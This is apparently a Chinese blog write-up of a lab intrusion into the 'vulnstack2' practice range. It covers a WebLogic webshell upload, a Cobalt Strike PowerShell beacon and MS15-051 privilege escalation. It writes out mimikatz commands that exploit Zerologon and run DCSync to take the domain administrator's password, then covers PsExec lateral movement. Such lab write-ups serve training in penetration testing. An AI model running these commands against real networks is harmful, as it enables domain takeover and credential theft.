vlunstack2靶场

一、环境搭建

一共有三台靶机,web,dc,pc,其中web需要出网因此需要设置双网卡且和攻击机kali处于同网段。具体配置如图

WEB:

 

PC:

DC:

kali:

二、外围打点

1.使用nmap扫描web服务器

发现7001 weblogic常用端口

3389远程登陆端口

2.weblogic rce利用

利用weblogic扫描器发现存在weblogic漏洞

利用webshell_generate生成jsp的蚁剑webshell 并利用上面的工具上传shell

地址为

C:\Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images

蚁剑连接地址为

http://ip:port/console/framework/skins/wlsconsole/images/shell.jsp

注意需要重启一下web服务器

其他上传地址参考Weblogic上传shell路径 - 掘金

三、内网渗透

1.利用webshell上线cs

利用cs的 web Delivery生成powershell

注意不要勾选x64这里x64不能成功上线

接着在蚁剑的terminals中执行生成的代码

成功上线

2.提权并进行内网探测

利用梼杌插件的 ms15-051进行提权,提权后进行端口扫描结果如下

通过插件查找域控主机

3.利用zerologon漏洞获取域控密码

利用如下命令查看域控服务器是否存在zerologon漏洞

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$

接着执行

mimikatz lsadump::zerologon /target:DC.de1ay.com /account:DC$ /exploit

继续执行如下命令获取域控服务器登录凭据

mimikatz lsadump::dcsync /domain:de1ay.com /dc:DC.de1ay.com /user:administrator /authuser:DC$ /authdomain:de1ay /authpassword:"" /authntlm

可知登录凭据为1qaz@WSX

4.添加域控主机credential并用PsExec将域内主机上线

在target中进行psexec

类似的可以使其他域控主机上线

  • 11
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值